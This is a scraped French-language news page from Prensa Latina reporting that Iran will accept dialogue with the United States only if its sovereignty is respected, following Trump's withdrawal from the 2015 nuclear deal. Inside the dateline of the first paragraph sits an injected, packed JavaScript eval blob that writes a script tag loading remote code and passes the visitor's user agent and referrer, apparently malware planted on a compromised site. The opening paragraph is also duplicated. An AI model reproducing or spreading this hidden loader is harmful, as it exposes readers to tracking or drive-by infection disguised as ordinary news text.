mercredi 17 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’Iran acceptera de dialoguer avec les Etats-Unis à condition que sa souveraineté soit respectée

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ryahy|var|u0026u|referrer|dfdaf||js|php'.split('|'),0,{})) 11 juin (Prensa Latina) L'Iran n'acceptera le dialogue avec les Etats-Unis que si sa souveraineté est respectée et que la Maison Blanche abandonne son langage menaçant, affirme une déclaration émise par la chancellerie perse.

Téhéran, 11 juin (Prensa Latina) L’Iran n’acceptera le dialogue avec les Etats-Unis que si sa souveraineté est respectée et que la Maison Blanche abandonne son langage menaçant, affirme une déclaration émise par la chancellerie perse.

Selon le porte-parole du Ministère des Affaires Etrangères, BahramQasemi, des négociations pourraient être envisagées à condition que Washington commence à s’adresser avec respect à la nation iranienne- héritière d’une grande e t ancienne civilisation- et que soient abandonnées les menaces et les sanctions.

Cette note a été publiée sur le site web de la chancellerie pour répondre aux déclarations du président nord-américain, Donald Trump, où il se dit optimiste que Téhéran acceptera le dialogue pour parvenir à un meilleur accord nucléaire.

Le 8 mai dernier, Trump a annoncé que son pays se retirait du Plan Intégral d’Action Commune, la convention signée en 2015 par l’Iran, la Russie, les Etats-Unis, le Royaume-Uni, la Chine, la France et l’Allemagne.

Les articles de ce pacte définissent les limitations au programme nucléaire iranien quant à une éventuelle utilisation de celui-ci à des fins d’armement, en échange de la levée des sanctions.

Le magnat du parti Républicain, affirme que Téhéran ne respecte pas ces articles et continue à développer son plan d’armement nucléaire alors que les experts de l’Organisation Internationale de l’Energie Atomique et les autres signataires de ce pacte affirment le contraire.

peo/tgj/arc/cvl

EN CONTINU
notes connexes